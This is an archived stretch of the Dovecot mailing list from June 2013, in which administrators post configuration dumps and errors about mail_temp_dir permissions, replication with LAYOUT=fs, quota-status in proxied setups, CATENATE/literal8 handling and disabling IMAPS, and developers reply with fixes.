Message-ID: <1371093430.24006.24.camel@innu.dovecot.net> On Thu, 2013-06-06 at 08:06 +0200, Henrik Larsson wrote: > I recently upgraded from 2.1.16 to 2.2.2 and started to receive the > following errors: > imap(henrik at example.com): Error: > stat(/var/db/dovecot/dovecot.imap.mail.example.com.16128.3209d13f842955c2) > failed: Permission denied > imap(henrik at example.com): Error: Temp file creation to > /var/db/dovecot/dovecot.imap.mail.example.com.16128. failed: Permission > denied > imap(henrik at example.com): Error: > stat(/var/db/dovecot/dovecot.imap.mail.example.com.16501.0ddff1dc93cdbe6a) > failed: Permission denied > imap(henrik at example.com): Error: Temp file creation to > /var/db/dovecot/dovecot.imap.mail.example.com.16501. failed: Permission > denied > > I didn't have these before the upgrade. The current permissions for the > /var/db/dovecot directory is root:wheel 755. > > What would be the correct permissions for the mail_temp_dir directory? Mail processes (imap, pop3, lda, etc.) need to be able to write to mail_temp_dir. > first_valid_uid = 125 .. > userdb { > args = /usr/local/etc/dovecot/dovecot-sql.conf.ext > driver = sql > } If all of your mail users use UID 125, then 125 can own the directory. If you use multiple UIDs, it needs to have the same permissions are your /tmp. From tss at iki.fi Thu Jun 13 06:21:44 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 13 Jun 2013 06:21:44 +0300 Subject: [Dovecot] Question about directory hash function. In-Reply-To: <51A4448D.1080506@yandex.ru> References: <51A4448D.1080506@yandex.ru> Message-ID: <1371093704.24006.26.camel@innu.dovecot.net> On Tue, 2013-05-28 at 09:45 +0400, Evgeny Basov wrote: > Hello, Timo. > > I have a question about %H in http://wiki2.dovecot.org/Variables : what > the hash function uses for calculations and how to get this value > manually? This is need for bypass way getting home directory. It's a pretty bad hash calculation: http://hg.dovecot.org/dovecot-2.2/file/754d244b8249/src/lib/hash.c#l501 In v2.2 hg there's now an MD5 based %N ("new hash") that gives much better distribution of values. From tss at iki.fi Thu Jun 13 06:23:59 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 13 Jun 2013 06:23:59 +0300 Subject: [Dovecot] post-login script and original remote ip in proxy mode In-Reply-To: References: Message-ID: <1371093839.24006.28.camel@innu.dovecot.net> On Mon, 2013-05-27 at 23:40 +0300, Ibrahim Harrani wrote: > Hi, > > I am running dovecot on 3 qmail-ldap server backend. > dovecot configured to use auth_pop3 wrapper for authentication. > Users logins to the qmail-ldap pop3&imap pools randomly. If a user is > mailhost is not the connected server, dovecot proxies the connection to the > user mailhost. In this case, I can not get the original client IP address > via post-logins script on user host. I see only the first connected server > IP as $IP environment. Set login_trusted_networks setting pointing to the proxies' IPs/network and you'll get the original IP. Requires v2.1.2+ to work with pop3 proxying. From tss at iki.fi Thu Jun 13 06:28:03 2013 From: tss at iki.fi (Timo Sirainen) Date: Thu, 13 Jun 2013 06:28:03 +0300 Subject: [Dovecot] CATENATE/literal8 issue In-Reply-To: <20130522093826.Horde.VietegxEiCMZBwrlm3Zj2A4@bigworm.curecanti.org> References: <20130521004050.Horde.ROP9wTEW3YVpVCORD9AVvQ1@bigworm.curecanti.org> <92A4F02B-84E1-4E64-AE66-32B67DAF3936@iki.fi> <20130521122436.Horde.yx8dh87QiDQVd6pQsTmvLw1@bigworm.curecanti.org> <53BC2E19-3AEC-4E14-8AC1-7A97885D9E84@iki.fi> <20130521130413.Horde.XgF5Kh32KHLili-OF5W8dg2@bigworm.curecanti.org> <20130522093826.Horde.VietegxEiCMZBwrlm3Zj2A4@bigworm.curecanti.org> Message-ID: <1371094083.24006.32.camel@innu.dovecot.net> On Wed, 2013-05-22 at 09:38 -0600, Michael M Slusarz wrote: > Quoting Michael M Slusarz : > > > Quoting Timo Sirainen : > > > >> Anyway .. the BINARY APPEND converts only the MIME parts that you > >> send with "Content-Transfer-Encoding: binary". Are you sending such > >> header to Dovecot? > > I can verify this isn't working as you described above: > > 1 APPEND "INBOX" CATENATE (TEXT {49+} > Content-Type: multipart/alternative; boundary="A" TEXT ~{1} > 1 NO [UNKNOWN-CTE] Binary input allowed only when the first part is binary. What do you do then if server advertises CATENATE but not BINARY? Anyway for the other possibilities Dovecot could: a) Put all CATENATEd messages through the istream-binary-converter, but just not do any actual C-T-E:binary conversion until the first ~{binary} part is found. b) Just treat ~{n} exactly the same as ~{n}, unless it's the first part of CATENATE. Maybe this should be aked about in IMAP mailing list .. (Didn't I already ask something about CATENATE+BINARY combination?) From michael at bigmichi1.de Thu Jun 13 07:37:04 2013 From: michael at bigmichi1.de (Michael Cramer) Date: Thu, 13 Jun 2013 06:37:04 +0200 Subject: [Dovecot] Connection closed by foreign host. In-Reply-To: <1371088979.24006.12.camel@innu.dovecot.net> References: <20130611192841.Horde.dSxEri7dixlgJ-8Kf7tulg5@horde.bigmichi1.de> <1371088979.24006.12.camel@innu.dovecot.net> Message-ID: <20130613063704.Horde.3GSc686GqFEkfn4te-0wew7@horde.bigmichi1.de> Zitat von Timo Sirainen : > On Tue, 2013-06-11 at 19:28 +0200, Michael Cramer wrote: >> i tried the latest dev version 2.2.2-0~auto54 for ubuntu and when i do some >> testing i got a connection closed. >> >> the commands are issued through telnet: >> >> 3 LIST () "" (*) >> Connection closed by foreign host. >> >> >> the command with number 3 results everytime in a connection closed. i >> turned on debug_log but nothing is shown there. > > doveconf -n output? sorry forgot that part to post root at i920:/srv/www/horde.bigmichi1.de/conf# doveconf -n # 2.2.2 (45399357008a): /etc/dovecot/dovecot.conf # OS: Linux 3.8.0-23-generic x86_64 Ubuntu 13.04 ext4 auth_mechanisms = plain login debug_log_path = /var/log/dovecot/debug.log dict { acl = pgsql:/etc/dovecot/dovecot-dict-sql.conf.ext expire = pgsql:/etc/dovecot/dovecot-dict-sql.conf.ext quota = pgsql:/etc/dovecot/dovecot-dict-sql.conf.ext } first_valid_gid = 8 first_valid_uid = 8 info_log_path = /var/log/dovecot/info.log last_valid_gid = 8 last_valid_uid = 8 log_path = /var/log/dovecot/error.log mail_debug = yes mail_gid = 8 mail_location = mdbox:/srv/vmail/mail/%d/%n:INDEXPVT=/srv/vmail/indexes/private/%d/%n:INDEX=/srv/vmail/indexes/shared/%d/%n mail_plugins = quota zlib acl expire virtual mail_uid = 8 mailbox_list_index = yes managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave imapflags notify mdbox_preallocate_space = yes user = postfix } unix_listener auth-userdb { group = mail mode = 0666 user = mail } } service dict { unix_listener dict { group = mail mode = 0660 user = mail } } service managesieve-login { inet_listener sieve { port = 4190 } } service quota-warning { executable = script /usr/local/bin/quota-warning.sh unix_listener quota-warning { user = mail } user = dovecot } ssl_cert = References: <20130611192841.Horde.dSxEri7dixlgJ-8Kf7tulg5@horde.bigmichi1.de> <1371088979.24006.12.camel@innu.dovecot.net> <20130613063704.Horde.3GSc686GqFEkfn4te-0wew7@horde.bigmichi1.de> Message-ID: <11781C18-8F45-4AD9-BF3A-C7405CDD68D0@iki.fi> On 13.6.2013, at 7.37, Michael Cramer wrote: >>> 3 LIST () "" (*) >>> Connection closed by foreign host. >>> >>> the command with number 3 results everytime in a connection closed. i >>> turned on debug_log but nothing is shown there. >> >> doveconf -n output? > > sorry forgot that part to post > > root at i920:/srv/www/horde.bigmichi1.de/conf# doveconf -n > # 2.2.2 (45399357008a): /etc/dovecot/dovecot.conf > # OS: Linux 3.8.0-23-generic x86_64 Ubuntu 13.04 ext4 .. > mdbox_preallocate_space = yes > user = postfix > } That seems to be missing a (big?) part in here. I was mainly wondering what namespace configs you have? Oh and BTW: > mail_location = mdbox:/srv/vmail/mail/%d/%n:INDEXPVT=/srv/vmail/indexes/private/%d/%n:INDEX=/srv/vmail/indexes/shared/%d/%n You don't need INDEXPVT for your own mails, only for the shared namespaces. From maillist.debian at gmail.com Thu Jun 13 09:03:11 2013 From: maillist.debian at gmail.com (Alex Dubinin) Date: Thu, 13 Jun 2013 10:03:11 +0400 Subject: [Dovecot] Dovecot 2 + IMAP In-Reply-To: References: <51B8B392.1010805@gmail.com> Message-ID: <51B9609F.5010004@gmail.com> 12.06.2013 22:34, Michael Kliewe ?????: > Hello Alex, > you asked exactly the same question 5 days ago and already got the > answer (from 2 people). Why did you ask again, didn't you receive the > answers? Thank you for your answer. Yes, i didn't receive answer (((( -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 554 bytes Desc: OpenPGP digital signature URL: From michael at bigmichi1.de Thu Jun 13 09:16:01 2013 From: michael at bigmichi1.de (Michael Cramer) Date: Thu, 13 Jun 2013 08:16:01 +0200 Subject: [Dovecot] Connection closed by foreign host. In-Reply-To: <11781C18-8F45-4AD9-BF3A-C7405CDD68D0@iki.fi> References: <20130611192841.Horde.dSxEri7dixlgJ-8Kf7tulg5@horde.bigmichi1.de> <1371088979.24006.12.camel@innu.dovecot.net> <20130613063704.Horde.3GSc686GqFEkfn4te-0wew7@horde.bigmichi1.de> <11781C18-8F45-4AD9-BF3A-C7405CDD68D0@iki.fi> Message-ID: <20130613081601.Horde.F_0enKWT864m__P6Mlv7nQ1@horde.bigmichi1.de> Zitat von Timo Sirainen : > On 13.6.2013, at 7.37, Michael Cramer wrote: > >>>> 3 LIST () "" (*) >>>> Connection closed by foreign host. >>>> >>>> the command with number 3 results everytime in a connection closed. i >>>> turned on debug_log but nothing is shown there. >>> >>> doveconf -n output? >> >> sorry forgot that part to post >> >> root at i920:/srv/www/horde.bigmichi1.de/conf# doveconf -n >> # 2.2.2 (45399357008a): /etc/dovecot/dovecot.conf >> # OS: Linux 3.8.0-23-generic x86_64 Ubuntu 13.04 ext4 > .. >> mdbox_preallocate_space = yes >> user = postfix >> } > > That seems to be missing a (big?) part in here. I was mainly > wondering what namespace configs you have? > > Oh and BTW: > >> mail_location = >> mdbox:/srv/vmail/mail/%d/%n:INDEXPVT=/srv/vmail/indexes/private/%d/%n:INDEX=/srv/vmail/indexes/shared/%d/%n > > You don't need INDEXPVT for your own mails, only for the shared namespaces. now the full conf # 2.2.2 (45399357008a): /etc/dovecot/dovecot.conf # OS: Linux 3.8.0-23-generic x86_64 Ubuntu 13.04 ext4 auth_mechanisms = plain login debug_log_path = /var/log/dovecot/debug.log dict { acl = pgsql:/etc/dovecot/dovecot-dict-sql.conf.ext expire = pgsql:/etc/dovecot/dovecot-dict-sql.conf.ext quota = pgsql:/etc/dovecot/dovecot-dict-sql.conf.ext } first_valid_gid = 8 first_valid_uid = 8 info_log_path = /var/log/dovecot/info.log last_valid_gid = 8 last_valid_uid = 8 log_path = /var/log/dovecot/error.log mail_debug = yes mail_gid = 8 mail_location = mdbox:/srv/vmail/mail/%d/%n:INDEXPVT=/srv/vmail/indexes/private/%d/%n:INDEX=/srv/vmail/indexes/shared/%d/%n mail_plugins = quota zlib acl expire virtual mail_uid = 8 mailbox_list_index = yes managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave imapflags notify mdbox_preallocate_space = yes mdbox_rotate_size = 10 M namespace { list = children location = mdbox:/srv/vmail/mail/%%d/%%n:INDEXPVT=/srv/vmail/indexes/private/%d/%n/shared/%%u:INDEX=/srv/vmail/indexes/shared/%d/%n/shared/%%u prefix = Shared/%%u/ separator = / subscriptions = no type = shared } namespace inbox { inbox = yes location = mailbox Archive { auto = subscribe special_use = \Archive } mailbox Drafts { auto = subscribe special_use = \Drafts } mailbox Sent { auto = subscribe special_use = \Sent } mailbox Spam { auto = subscribe special_use = \Junk } mailbox Trash { auto = subscribe special_use = \Trash } mailbox virtual/All { auto = subscribe special_use = \All } mailbox virtual/Flagged { auto = subscribe special_use = \Flagged } prefix = separator = / type = private } namespace virtual { location = virtual:/srv/vmail/virtual:INDEXPVT=/srv/vmail/indexes/private/%d/%n/virtual:INDEX=/srv/vmail/indexes/shared/%d/%n/virtual prefix = virtual/ separator = / } passdb { args = /etc/dovecot/dovecot-sql.conf.ext driver = sql } plugin { acl = vfile:/srv/vmail/acl:cache_secs=300 acl_anyone = allow acl_shared_dict = proxy::acl expire = Trash 7 Trash/* 7 Spam 30 expire_dict = proxy::expire quota = dict:User quota::proxy::quota quota_warning = storage=95%% quota-warning 95 %u quota_warning2 = storage=80%% quota-warning 80 %u quota_warning3 = -storage=100%% quota-warning below %u sieve = /srv/vmail/sieve/%d/%n/.dovecot.sieve sieve_default = /srv/vmail/sieve/default.sieve sieve_dir = /srv/vmail/sieve/%d/%n/ sieve_extensions = +notify +imapflags sieve_global_dir = /srv/vmail/sieve/global } postmaster_address = postmaster at bigmichi1.de protocols = " imap sieve" service auth-worker { user = $default_internal_user } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0666 user = postfix } unix_listener auth-userdb { group = mail mode = 0666 user = mail } } service dict { unix_listener dict { group = mail mode = 0660 user = mail } } service managesieve-login { inet_listener sieve { port = 4190 } } service quota-warning { executable = script /usr/local/bin/quota-warning.sh unix_listener quota-warning { user = mail } user = dovecot } ssl_cert = References: <51B6547A.7050504@erba.tv> <1371090685.24006.14.camel@innu.dovecot.net> Message-ID: <51B96BB0.7010409@erba.tv> On 13/06/13 04:31, Timo Sirainen wrote: > On Tue, 2013-06-11 at 00:34 +0200, John Fawcett wrote: >> Hi I came across this error which happend immedately after a mail >> delivery to the inbox. Should I look for the problem externally to >> dovecot (ie. file system, operating system) or within dovecot? I never >> saw this error before installing 2.2.1, with 2.2.2 I seemed to get even >> more of them so currently back on 2.2.1 >> >> Jun 11 00:00:05 rosalia dovecot: imap(myemail at mydomain): Error: >> Corrupted transaction log file >> /var/vmail/mydomain/myemail at mydomain/dovecot.index.log seq 311: file >> size shrank (1184 < 1304) (sync_offset=1304) > Are you using NFS or some other cluster filesystem with multiple > servers? If yes, see http://wiki2.dovecot.org/NFS. If not, show doveconf > -n and describe the setup more. > > TImo thanks for your response. There is no NFS involved. The file system seems to be reiserfs (as reported by df -T) thogh I wonder why fsck reports it would use fsck.ext2 (which I did not run). It is a single server vpn container hosting a few sites and low volume mail service. The operating system is centos 6.4 The setup is with postfix, amavisd and dovecot using sieve. Dovecot and sieve are built from source Clients are roundcube and usual mail clients mainly thunderbird. I cannot link the errors to anything specific, except that they started happening 5 minutes after upgrade to 2.2.1 from 2.1.5. The error happens on multiple mailboxes. I never saw the error prior to that, looking at logs back to version 2.1.7. Below is the dovecot -n output Thanks John dovecot -n # 2.2.1: /etc/dovecot/dovecot.conf # OS: Linux 2.6.18-028stab092.1 x86_64 CentOS release 6.4 (Final) auth_mechanisms = plain login dict { expire = mysql:/etc/dovecot/dovecot-dict-sql.conf.ext quota = mysql:/etc/dovecot/dovecot-dict-sql.conf.ext } first_valid_uid = 200 listen = 80.237.194.64 mail_plugins = quota expire managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave passdb { args = /etc/dovecot/dovecot-sql.conf.ext driver = sql } plugin { expire = Trash expire2 = Trash/* expire3 = Spam expire4 = Postmaster expire_dict = proxy::expire fts = squat fts_squat = partial=4 full=10 quota = dict:User quota::proxy::quota quota_rule = *:storage=1G quota_rule2 = Trash:storage=+100M sieve = ~/sieve/.dovecot.sieve sieve_dir = ~/sieve } protocols = imap pop3 lmtp sieve service auth-worker { user = $default_internal_user } service auth { unix_listener auth-userdb { group = mail mode = 0660 } } service dict { unix_listener dict { group = mail mode = 0660 } } service lmtp { unix_listener /var/spool/postfix/private/dovecot-lmtp { group = postfix mode = 0660 user = postfix } } ssl_cert = References: <1371088613.24006.9.camel@innu.dovecot.net> Message-ID: <51B97618.5020603@birkenwald.de> Am 13.06.2013 03:56, schrieb Timo Sirainen: > On Wed, 2013-06-12 at 19:51 +0000, Bernhard Schmidt wrote: >> Debian Wheezy amd64 plus Stefan's stable-auto/dovecot2.2 repository >> 2:2.2.2-0~auto+57 = 16495:d447dcc6b611 >> >> Crash goes away when I disable mail_attachment_dir, happens with a >> fresh home as well > .. >> Jun 12 21:46:23 lxmhs69 dovecot: lmtp(20120, >> ext44903 at mstoretest.mail.xxx.de): Panic: file istream.c: line 163 >> (i_stream_read): assertion failed: (old_size == _stream->pos - >> _stream->skip) > > Can you easily reproduce this? Does it happen with all mails? Only mails > that contain attachments? Only one specific mail? I couldn't reproduce > with a couple of tests. I can reproduce with mails with a random attachment > 128k. I'm using smtp-cli to test dd if=/dev/random of=random1M bs=1M count=1 ./smtp-cli-3.2 --server --from --to --subject Test --attach=random1M I can send you a sample. Bernhard From claus.r at bayern-mail.de Thu Jun 13 11:03:35 2013 From: claus.r at bayern-mail.de (claus.r at bayern-mail.de) Date: Thu, 13 Jun 2013 10:03:35 +0200 Subject: [Dovecot] rawlog without setting home in userdb In-Reply-To: <1371091315.24006.16.camel@innu.dovecot.net> References: <51AAFE3C.8080701@bayern-mail.de> <1371091315.24006.16.camel@innu.dovecot.net> Message-ID: Am 2013-06-13 04:41, schrieb Timo Sirainen: > On Sun, 2013-06-02 at 10:11 +0200, Claus wrote: > Hi all, > > in my settup i decided to set mail_home in 10-mail.conf, > and let dovecot do the hashing to a 2-level directory structure. > > mail_location = mdbox:~/mdbox:ALT=/altstorage/%h/mdbox > mail_home = /vmail/%1Mu/%2.1Mu/%u > > In my userdb ist homedirectory not set and everythink works as > expected, > except when i use rawlog i get only logs in ~/dovecot.rawlog if home is > set in userdb. > In wiki http://wiki2.dovecot.org/Debugging/Rawlog > it reads: > > If you don't have the home directory and you can't or don't want to > modify userdb configuration, you can add: > mail_home = /home/%u > # or temporarily even e.g. mail_home = /tmp/temp-home > > Looks like the wiki was wrong, mail_home field can't work there. > Updated > it with a new suggestion about userdb { default_fields }. Thank's for your reply, i changed my configuration and did'nt set the mail_home but the homr in uderdb default_fieled now it works perfect for me. A little extra question: why do you split in and out in rawlog? From srf at sanger.ac.uk Thu Jun 13 12:41:43 2013 From: srf at sanger.ac.uk (Simon Fraser) Date: Thu, 13 Jun 2013 10:41:43 +0100 Subject: [Dovecot] Replication and LAYOUT=fs In-Reply-To: <1371088778.24006.11.camel@innu.dovecot.net> References: <1371033541.2449.14.camel@ubu101751> <1371088778.24006.11.camel@innu.dovecot.net> Message-ID: <1371116503.2449.33.camel@ubu101751> On Thu, 2013-06-13 at 04:59 +0300, Timo Sirainen wrote: > On Wed, 2013-06-12 at 11:39 +0100, Simon Fraser wrote: > > Hello folks, > > > > I have a problem with replication and mail_location with LAYOUT=fs set. > > > > If I set "mail_location = maildir:~/mail" (leaving out the :LAYOUT=fs), > > create and populate some mailboxes and subfolders, they all get > > replicated. If I start with a clean mail spool and LAYOUT=fs, I can > > create some new mailboxes and subfolders but only the inbox is > > replicated. Subfolders are ignored. > > I can't think of how that's possible, unless you have different > mail_location settings in different places (e.g. doveadm sees something > different than imap). Does "doveadm mailbox list -u user at domain" work > with LAYOUT=fs? Good question: no, it doesn't. I only have one mail_location setting, though, which is global rather than in a scoped area. # doveadm mailbox list -u testuser at sanger.ac.uk test2 test2/test3 Trash INBOX # find /mail/spool/testuser/mail/ -type d /mail/spool/testuser/mail/ /mail/spool/testuser/mail/test2 /mail/spool/testuser/mail/test2/test3 /mail/spool/testuser/mail/test2/test3/cur /mail/spool/testuser/mail/test2/test3/tmp /mail/spool/testuser/mail/test2/test3/new /mail/spool/testuser/mail/test2/cur /mail/spool/testuser/mail/test2/tmp /mail/spool/testuser/mail/test2/new /mail/spool/testuser/mail/Trash /mail/spool/testuser/mail/Trash/cur /mail/spool/testuser/mail/Trash/tmp /mail/spool/testuser/mail/Trash/new /mail/spool/testuser/mail/cur /mail/spool/testuser/mail/tmp /mail/spool/testuser/mail/INBOX /mail/spool/testuser/mail/INBOX/test1 /mail/spool/testuser/mail/INBOX/test1/cur /mail/spool/testuser/mail/INBOX/test1/tmp /mail/spool/testuser/mail/INBOX/test1/new /mail/spool/testuser/mail/new I asked Thunderbird to create 'test1' as a subfolder of 'INBOX'. I've tested some more with folders on the same level as inbox, and those work, including their subfolders. So it must be the non-folder 'INBOX' that isn't replicated: without LAYOUT=fs it's represented as ".INBOX.test1", which has all the relevant folder entries in it. Presumably it skips a directory and its subdirectories if it doesn't contain this data? I found the following option, which moves INBOX and so makes it all work: mail_location = maildir:~/mail:LAYOUT=fs:INBOX=~/mail/INBOX Is this a relatively sane thing to do? Thank you for your help, Simon. -- The Wellcome Trust Sanger Institute is operated by Genome Research Limited, a charity registered in England with number 1021457 and a company registered in England with number 2742969, whose registered office is 215 Euston Road, London, NW1 2BE. From benoit.panizzon at imp.ch Thu Jun 13 13:14:04 2013 From: benoit.panizzon at imp.ch (Benoit Panizzon) Date: Thu, 13 Jun 2013 12:14:04 +0200 Subject: [Dovecot] quota-status not working in distributed environment Message-ID: <201306131214.04765.benoit.panizzon@imp.ch> Hello List Quick overview of our set-up: Postfix / Dovecot (2.2.2.1) / MySQL Cluster on (at the moment) three Servers to create a HA environment where you could easily add additional servers as the demand or load grows. Circular dovecot replication is used so each server uses another one as replication partner and allowing one server to fail. Dovecot Proxy Feature being used, so we can use round-robin DNS and each server can forward the connecting user to the correct 'master' for his mailbox. So far, everything works as expected. Now we want to reject emails to 'full' mailboxes during SMTP to prevent backscatter and use the quota-status policy service from within postfix. That works fine, if the mailbox or it's replica is present on the machine where quota-status is called, but it fails if it's run on a machine where neither the mailbox or the replica is present. In our case, we get a correct SMTP 550 'Mailbox Full' Reject in two cases and a LMTP generated bounce in the later case. Also `doveadm quota get -u user at example.com` return the correct quota if run on the two machines which have the mailbox and it's copy locale, but return 0% used if run on the other machine. Is there a way to get quota-status to also use the proxy feature to request the quota information from the correct machine? Or is the postfix policy daemon call to the quota-status socket documented somewhere (it must be, but where?) so we could implement it from within the Milter? (we use the sendmail Milter API from postfix to filter spam and viruses, do sender/recipient rewriting, forward bounce matching, rate limmiting, login/IP statistics to block botnets abusing phished addresses and legal intercept stuff anyway) Kind regards Benoit Panizzon -- I m p r o W a r e A G - ______________________________________________________ Zurlindenstrasse 29 Tel +41 61 826 93 07 CH-4133 Pratteln Fax +41 61 826 93 02 Schweiz Web http://www.imp.ch ______________________________________________________ From yonatan at cuppcomputing.com Thu Jun 13 11:26:10 2013 From: yonatan at cuppcomputing.com (Yonatan Broza) Date: Thu, 13 Jun 2013 11:26:10 +0300 Subject: [Dovecot] IMAPC feature description Message-ID: <51B98222.30909@cuppcomputing.com> Hi, I couldn't find any decent documentation about the IMAPC feature. Could someone please explain the purpose of this feature? In particular, what are the differences between IMAPC and reverse proxying? Thanks. From simon.buongiorno at gmail.com Thu Jun 13 17:02:44 2013 From: simon.buongiorno at gmail.com (Simon B) Date: Thu, 13 Jun 2013 16:02:44 +0200 Subject: [Dovecot] Turn off IMAPS? Message-ID: Hi I've upgraded to 2.1.7 and finally decided to turn off imaps and pop3s because these days everyone uses tls over 143 anyway. But it's on and I can't figure out why. I only have non-ssl versions specified: protocols = imap pop3 I've stopped and started and the ports are still open and netstat says dovecot is listening on them.. mail:~# netstat -tulnp | grep dove tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN 29340/dovecot tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN 29340/dovecot tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 29340/dovecot tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN 29340/dovecot tcp6 0 0 :::993 :::* LISTEN 29340/dovecot tcp6 0 0 :::995 :::* LISTEN 29340/dovecot tcp6 0 0 :::110 :::* LISTEN 29340/dovecot tcp6 0 0 :::143 :::* LISTEN 29340/dovecot Any ideas? Thanks. Simon Here's my doveconf - n # 2.1.7: /etc/dovecot/dovecot.conf # OS: Linux 3.2.0-4-amd64 x86_64 Debian 7.0 ext3 auth_mechanisms = plain login auth_verbose = yes disable_plaintext_auth = no first_valid_uid = 109 last_valid_uid = 109 log_timestamp = "%Y-%m-%d %H:%M:%S " login_log_format_elements = user=<%u> method=%m rip=%r %c mail_location = maildir:/var/spool/mail/virtual/%d/%n mail_privileged_group = mailsystem maildir_very_dirty_syncs = yes passdb { args = /etc/dovecot/dovecot-sql.conf driver = sql } plugin { quota = maildir } protocols = imap pop3 service auth { unix_listener /var/spool/postfix/private/auth { group = mailsystem mode = 0660 user = postfix } unix_listener auth-master { group = mailsystem mode = 0660 user = mailsystem } user = mailsystem } ssl_ca = References: <20130521004050.Horde.ROP9wTEW3YVpVCORD9AVvQ1@bigworm.curecanti.org> <92A4F02B-84E1-4E64-AE66-32B67DAF3936@iki.fi> <20130521122436.Horde.yx8dh87QiDQVd6pQsTmvLw1@bigworm.curecanti.org> <53BC2E19-3AEC-4E14-8AC1-7A97885D9E84@iki.fi> <20130521130413.Horde.XgF5Kh32KHLili-OF5W8dg2@bigworm.curecanti.org> <20130522093826.Horde.VietegxEiCMZBwrlm3Zj2A4@bigworm.curecanti.org> <1371094083.24006.32.camel@innu.dovecot.net> Message-ID: <20130613083520.Horde.nvyTJUYoRiQP2EWLu2xaVQ1@bigworm.curecanti.org> Quoting Timo Sirainen : > On Wed, 2013-05-22 at 09:38 -0600, Michael M Slusarz wrote: >> Quoting Michael M Slusarz : >> >> > Quoting Timo Sirainen : >> > >> >> Anyway .. the BINARY APPEND converts only the MIME parts that you >> >> send with "Content-Transfer-Encoding: binary". Are you sending such >> >> header to Dovecot? >> >> I can verify this isn't working as you described above: >> >> 1 APPEND "INBOX" CATENATE (TEXT {49+} >> Content-Type: multipart/alternative; boundary="A" TEXT ~{1} >> 1 NO [UNKNOWN-CTE] Binary input allowed only when the first part is binary. > > What do you do then if server advertises CATENATE but not BINARY? Send as a regular literal. If there truly are nulls in the output, there's not much we can do so we send as-is and hope for the best. > Anyway for the other possibilities Dovecot could: > > a) Put all CATENATEd messages through the istream-binary-converter, but > just not do any actual C-T-E:binary conversion until the first ~{binary} > part is found. > > b) Just treat ~{n} exactly the same as ~{n}, unless it's the first part > of CATENATE. > > Maybe this should be aked about in IMAP mailing list .. (Didn't I > already ask something about CATENATE+BINARY combination?) Yeah: http://mailman2.u.washington.edu/pipermail/imap-protocol/2012-June/001787.html No responses :) It is concerning because RFC 4466 indicates that literal8's are allowed for both APPEND and MULTIAPPEND, which is essentially an extended APPEND. But RFC 4469 defines CATENATE TEXT as literal only: RFC 4466: append-data = literal / literal8 / append-data-ext RFC 4469: append-data =/ "CATENATE" SP "(" cat-part *(SP cat-part) ")" cat-part = text-literal / url text-literal = "TEXT" SP literal To me CATENATE =~ MULTIAPPEND - it is just another form of an extended APPEND. Not sure why it shouldn't be allowed there. But from a strict ABNF standpoint, you are correct that I shouldn't be sending literal8's. I'll ask myself on the IMAP list why this design choice was made. For the record... given the varying levels of BINARY support in different IMAP servers (UW IMAP is flat-out broken), I've gone ahead and bit the bullet and we now pre-scan outgoing append literals for null characters and only use literal8's when absolutely necessary. I was probably being too clever for my own good in assuming that I can just send and assume the server will handle all issues. With that being said... I was able to reliably reproduce a parsing issue in Dovecot 2.2.x when doing a MULTIAPPEND w/literal8's. I need to track down if this is a single message causing the issue or some sort of cumulative bug that only appears once you've done something like 200-300 sequential appends. I can verify that a switch from literal8 -> literal fixes the issue. I'll try to create a reproducible test case. michael From slusarz at curecanti.org Thu Jun 13 17:40:02 2013 From: slusarz at curecanti.org (Michael M Slusarz) Date: Thu, 13 Jun 2013 08:40:02 -0600 Subject: [Dovecot] CATENATE/literal8 issue In-Reply-To: <20130613083520.Horde.nvyTJUYoRiQP2EWLu2xaVQ1@bigworm.curecanti.org> References: <20130521004050.Horde.ROP9wTEW3YVpVCORD9AVvQ1@bigworm.curecanti.org> <92A4F02B-84E1-4E64-AE66-32B67DAF3936@iki.fi> <20130521122436.Horde.yx8dh87QiDQVd6pQsTmvLw1@bigworm.curecanti.org> <53BC2E19-3AEC-4E14-8AC1-7A97885D9E84@iki.fi> <20130521130413.Horde.XgF5Kh32KHLili-OF5W8dg2@bigworm.curecanti.org> <20130522093826.Horde.VietegxEiCMZBwrlm3Zj2A4@bigworm.curecanti.org> <1371094083.24006.32.camel@innu.dovecot.net> <20130613083520.Horde.nvyTJUYoRiQP2EWLu2xaVQ1@bigworm.curecanti.org> Message-ID: <20130613084002.Horde.e2TTfM7akmsNks3SjGLDzQ1@bigworm.curecanti.org> Quoting Michael M Slusarz : > It is concerning because RFC 4466 indicates that literal8's are > allowed for both APPEND and MULTIAPPEND, which is essentially an > extended APPEND. But RFC 4469 defines CATENATE TEXT as literal only: > > RFC 4466: > append-data = literal / literal8 / append-data-ext > > RFC 4469: > append-data =/ "CATENATE" SP "(" cat-part *(SP cat-part) ")" > cat-part = text-literal / url > text-literal = "TEXT" SP literal > > To me CATENATE =~ MULTIAPPEND - it is just another form of an > extended APPEND. Not sure why it shouldn't be allowed there. Answered my own question here - sure enough, it was an oversight: http://osdir.com/ml/ietf.imapext/2006-03/msg00030.html michael From ben at morrow.me.uk Thu Jun 13 17:58:51 2013 From: ben at morrow.me.uk (Ben Morrow) Date: Thu, 13 Jun 2013 15:58:51 +0100 Subject: [Dovecot] Turn off IMAPS? In-Reply-To: References: Message-ID: <20130613145850.GD58518@anubis.morrow.me.uk> At 4PM +0200 on 13/06/13 you (Simon B) wrote: > > I've upgraded to 2.1.7 and finally decided to turn off imaps and pop3s > because these days everyone uses tls over 143 anyway. But it's on and > I can't figure out why. > > I only have non-ssl versions specified: > protocols = imap pop3 Dovecot listens on imaps/pop3s by default, so you need to disable them explicitly like this: service imap-login { inet_listener imap { # defaults } inet_listener imaps { # disable the imaps service port = 0 } } and the equivalent for pop3-login. Ben From inu at inusasha.de Thu Jun 13 17:56:57 2013 From: inu at inusasha.de (InuSasha) Date: Thu, 13 Jun 2013 16:56:57 